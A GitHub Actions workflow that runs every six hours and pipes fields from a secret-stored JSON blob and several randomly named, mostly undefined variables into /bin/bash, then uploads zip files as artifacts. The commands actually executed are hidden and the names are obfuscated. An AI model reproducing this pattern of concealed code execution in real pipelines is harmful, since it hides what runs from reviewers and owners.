name: jiejinpanbai
on:
  workflow_dispatch:

  schedule:
    - cron: '37 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiejinpanbai
        env:
          u86536: ${{ secrets.u86536 }}
        run: |
          printf '%s' "$u86536" | jq -r .p18001 | /bin/bash
          printf '%s' "$xobxq76240" | jq -r .u613 | /bin/bash
          echo $hmn37 | jq -r .goh21216 | /bin/bash
          printf '%s' "$g1" | jq -r .ane21 | /bin/bash
          echo $kisei68 | jq -r .ugxhb9650 | /bin/bash
          echo $dj0 | jq -r .ftcjx9056 | /bin/bash
          echo $tjnkh6929 | jq -r .b535 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: zp0nM464
          path: "*.zip"
          retention-days: 1
